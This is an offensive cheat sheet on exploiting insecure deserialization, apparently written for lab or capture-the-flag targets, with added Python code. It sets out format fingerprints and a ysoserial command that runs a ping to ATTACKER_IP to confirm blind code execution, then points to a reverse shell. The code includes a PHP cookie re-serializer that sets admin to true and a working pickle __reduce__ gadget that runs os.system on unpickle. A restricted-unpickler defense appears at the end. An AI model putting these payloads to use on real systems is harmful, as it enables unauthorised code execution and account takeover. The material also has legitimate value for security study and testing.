DESERIALIZATION

Identify serialized data

Recognize serialization formats — each format has its own gadget chains and tooling, so identify the format before anything else

Look for base64 blobs in cookies/params (often URL-encoded on top: %3D for padding, %2B for +; decode that layer first)
Java: rO0AB (base64), AC ED 00 05 (hex)
PHP: O:4:"User":2:{...} (raw) or Tzo0... (base64 of O:4:)
Python pickle: gASV (base64), 80 04 95 (hex, protocol 4); protocols 2/3 start 80 02 / 80 03
Example Output
Cookie: session=rO0ABXNyABFq... (Java - starts with rO0AB)
Cookie: session=Tzo0OiJVc2VyIjoyOntz... (PHP - base64 of O:4:"User":2:{s...)
Cookie: session=gASVKAAAA... (Python pickle - starts with gASV, i.e. 80 04 95)
(Identify format, then craft exploit)
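The identification step above, as an added example (not code from the page): a small classifier that strips URL-encoding and base64 (standard or URL-safe, padding restored) and then matches the magic bytes of the decoded payload. It goes a little beyond the page by also recognising .NET BinaryFormatter blobs (header 00 01 00 00 00 FF FF FF FF, base64 "AAEAAAD/////"); the sample cookies in SAMPLES are constructed here, not captured from any target.

```python
import base64
import binascii
import pickle
import re
from urllib.parse import quote, unquote

# Magic bytes at the start of the *decoded* payload for each format.
JAVA_MAGIC = b"\xac\xed\x00\x05"                # ObjectOutputStream STREAM_MAGIC + STREAM_VERSION
PICKLE_PROTO = re.compile(rb"^\x80[\x02-\x05]")  # PROTO opcode: protocols 2-5 (4 and 5 add \x95 FRAME)
PHP_SERIAL = re.compile(rb'^(?:[OC]:\d+:"[^"]*":\d+:\{|a:\d+:\{|s:\d+:"|[ibd]:|N;)')
# .NET BinaryFormatter SerializationHeaderRecord (base64 "AAEAAAD/////"); added here, not on the page.
DOTNET_MAGIC = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"


def decode_layers(value: str) -> tuple[bytes, str]:
    """Undo URL-encoding and (URL-safe) base64; fall back to treating the text as raw."""
    text = unquote(value.strip())
    padded = text + "=" * (-len(text) % 4)       # cookies often lose their '=' padding
    for encoding, altchars in (("base64", None), ("base64url", b"-_")):
        try:
            return base64.b64decode(padded, altchars=altchars, validate=True), encoding
        except binascii.Error:
            continue
    return text.encode("utf-8", "surrogateescape"), "raw"


def identify_format(value: str) -> tuple[str, str]:
    """Return (format, encoding) for a cookie/parameter value."""
    raw, encoding = decode_layers(value)
    if raw.startswith(JAVA_MAGIC):
        return "java", encoding
    if PICKLE_PROTO.match(raw):
        return "pickle", encoding
    if raw.startswith(DOTNET_MAGIC):
        return "dotnet", encoding
    if PHP_SERIAL.match(raw):
        return "php", encoding
    return "unknown", encoding


# Constructed sample cookies (not captured from any real target).
SAMPLES = {
    "java": base64.b64encode(JAVA_MAGIC + b"sr\x00\x11java.util.HashMap").decode(),
    "php_raw": 'O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:0;}',
    "php_b64": base64.b64encode(b'O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:0;}').decode(),
    "pickle": base64.b64encode(pickle.dumps({"user": "admin"}, protocol=4)).decode(),
    "dotnet": base64.b64encode(DOTNET_MAGIC + b"\x01\x00\x00\x00").decode(),
    "jwt": "eyJhbGciOiJIUzI1NiJ9.e30.x",         # base64-looking but not serialized data
}


def triage(samples: dict = SAMPLES) -> dict:
    """Classify every sample; the URL-encoded form of each must give the same answer."""
    return {name: identify_format(quote(value)) for name, value in samples.items()}
```

Run `triage()` to see all five samples classified; the JWT is there as a negative case, since dotted base64 segments are the most common thing mistaken for a serialized blob.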

Java deserialization

Generate Java payload — only works if a known gadget library is on the app's classpath (CommonsCollections1 needs commons-collections 3.1 and an old JDK, pre-8u72; try CommonsCollections5/6 or other chains otherwise)

java -jar ysoserial.jar <gadget> '<command>'
Example Output
java -jar ysoserial.jar CommonsCollections1 'ping -c 3 ATTACKER_IP' | base64 -w0

Replace cookie with payload (URL-encode it: +, / and = break cookie parsing)
Attacker: tcpdump -i tun0 icmp
Got ICMP from 10.10.10.5
(Confirmed RCE blind via out-of-band ICMP, now use a reverse shell)

PHP deserialization

Modify serialized cookie — property tampering, or full PHP object injection if the app loads a class with a dangerous magic method

Craft a serialized object of a class the app has loaded whose __wakeup, __destruct or __toString does something dangerous (file write, include, eval); the class must exist at unserialize() time
Example Output
Original: O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:0;}
Modified: O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}

Set admin=true via deserialization (every s:N: length prefix must match its data exactly, or unserialize() returns false)
(Or exploit __wakeup/__destruct for RCE; tools such as phpggc generate chains for common frameworks)
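The cookie edit above, as an added example that is not part of the page: a minimal PHP serialize()-format parser and re-serializer in Python, so a property can be changed (or a string lengthened) and every length prefix is recomputed instead of hand-counted. It handles N, b, i, d, s, a and O records; C: custom-serializable records and r:/R: back-references are not supported. ORIGINAL is the page's example cookie; escalate() is a helper name chosen here.

```python
import re
from dataclasses import dataclass, field

_NUM = re.compile(rb"-?\d+(?:\.\d+)?(?:[eE][-+]?\d+)?")


@dataclass
class PhpObject:
    """O:<len>:"<class>":<n>:{...} with its properties in declaration order."""
    cls: str
    props: dict = field(default_factory=dict)


def _expect(data: bytes, pos: int, token: bytes) -> int:
    if data[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + len(token)


def parse(data: bytes, pos: int = 0):
    """Parse one PHP-serialized value starting at pos; return (value, next_pos)."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                    # N;
        return None, _expect(data, pos + 1, b";")
    if tag in (b"b", b"i", b"d"):                      # b:1;  i:42;  d:0.5;
        m = _NUM.match(data, pos + 2)
        val = {b"b": lambda r: r == b"1", b"i": int, b"d": float}[tag](m.group())
        return val, _expect(data, m.end(), b";")
    if tag == b"s":                                    # s:<len>:"<bytes>";  len is in BYTES
        m = _NUM.match(data, pos + 2)
        length, start = int(m.group()), m.end() + 2    # skip :"
        body = data[start:start + length]
        end = _expect(data, start + length, b'";')     # fails if the length prefix lies
        return body.decode("utf-8", "surrogateescape"), end
    if tag == b"a":                                    # a:<n>:{key;value...}
        m = _NUM.match(data, pos + 2)
        count, pos = int(m.group()), m.end() + 2       # skip :{
        items = {}
        for _ in range(count):
            key, pos = parse(data, pos)
            items[key], pos = parse(data, pos)
        return items, _expect(data, pos, b"}")
    if tag == b"O":                                    # O:<len>:"<class>":<n>:{...}
        m = _NUM.match(data, pos + 2)
        name_len, name_start = int(m.group()), m.end() + 2
        obj = PhpObject(data[name_start:name_start + name_len].decode())
        m = _NUM.match(data, name_start + name_len + 2)  # skip ":
        count, pos = int(m.group()), m.end() + 2
        for _ in range(count):                         # keys may carry \0*\0 / \0Class\0 prefixes
            key, pos = parse(data, pos)
            obj.props[key], pos = parse(data, pos)
        return obj, _expect(data, pos, b"}")
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")


def dump(value) -> bytes:
    """Re-serialize, recomputing every length prefix (PHP rejects wrong ones)."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):                        # before int: bool is an int subclass
        return b"b:1;" if value else b"b:0;"
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, float):
        return b"d:%s;" % repr(value).encode()
    if isinstance(value, str):
        raw = value.encode("utf-8", "surrogateescape")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(dump(k) + dump(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        name = value.cls.encode()
        body = b"".join(dump(k) + dump(v) for k, v in value.props.items())
        return b'O:%d:"%s":%d:{%s}' % (len(name), name, len(value.props), body)
    raise TypeError(f"cannot serialize {type(value).__name__}")


ORIGINAL = b'O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:0;}'   # the page's cookie


def escalate(cookie: bytes, **changes) -> bytes:
    """Parse the object, overwrite the given properties, re-serialize with correct lengths."""
    obj, end = parse(cookie)
    if end != len(cookie):
        raise ValueError("trailing data after the object")
    obj.props.update(changes)
    return dump(obj)
```

`escalate(ORIGINAL, admin=True)` reproduces the Modified line above; `escalate(ORIGINAL, name="administrator")` shows why the round trip matters, since the prefix becomes s:13: and a hand-edited s:5: would make unserialize() fail silently.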

Python pickle

Python unpickle RCE — anywhere the app unpickles user-controlled data (custom session cookies, cache entries, queue messages). Caveat: Flask's default session is signed JSON, not pickle, and Django only unpickles sessions with the legacy PickleSerializer and only after its signature check, so that path needs the SECRET_KEY

Vulnerable sink on the server: import pickle; pickle.loads(malicious_data)
Example Output
import base64, os, pickle
class Exploit:
    def __reduce__(self):
        # unpickling this object calls os.system('id') instead of rebuilding Exploit
        return (os.system, ('id',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()  # base64 so it survives in a cookie

Send as session cookie
Server unpickles -> __reduce__ makes pickle.loads call os.system('id')
(RCE via Python deserialization; no signature check means no key is needed)
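The full pickle flow, as an added example that is not code from the page: the gadget from above packaged as a cookie, the blind pickle.loads() sink that runs it, and the hardened alternative a defender would swap in (a pickle.Unpickler subclass whose find_class only resolves an explicit allow-list, so any GLOBAL such as posix.system is refused before it is called). The demo uses `echo pwned` in place of the page's `id`; build_payload, vulnerable_load, safe_load and RestrictedUnpickler are names chosen here.

```python
import base64
import io
import os
import pickle


class Exploit:
    """Gadget: on unpickle, __reduce__ makes pickle call os.system(cmd)."""

    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def build_payload(cmd: str) -> str:
    """Pickle the gadget and base64 it so it fits in a cookie (protocol 4 -> 'gASV...')."""
    return base64.b64encode(pickle.dumps(Exploit(cmd), protocol=4)).decode()


def vulnerable_load(cookie: str):
    """What the target does: blindly unpickle the cookie. os.system runs inside loads()."""
    return pickle.loads(base64.b64decode(cookie))


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: every GLOBAL/STACK_GLOBAL must be on a tiny allow-list."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}  # dict/list/str/bool need no global

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_load(cookie: str):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie))).load()


def demo() -> dict:
    """Run both loaders against a legitimate session and the gadget payload."""
    legit = base64.b64encode(pickle.dumps({"user": "bob", "admin": False}, protocol=4)).decode()
    evil = build_payload("echo pwned")           # harmless stand-in for the page's 'id'
    results = {
        "evil_prefix": evil[:4],
        "evil_references_system": b"system" in base64.b64decode(evil),
        "legit_via_safe_load": safe_load(legit),
        "evil_ran_in_vulnerable_load": isinstance(vulnerable_load(evil), int),  # os.system exit status
    }
    try:
        safe_load(evil)
        results["evil_blocked"] = False
    except pickle.UnpicklingError:
        results["evil_blocked"] = True
    return results
```

The allow-list is the only thing standing between the unpickler and arbitrary code, which is why the real fix is to not unpickle untrusted input at all: store sessions as signed JSON and treat pickle as trusted-only, the restricted unpickler being a stopgap for data that genuinely has to stay in pickle form.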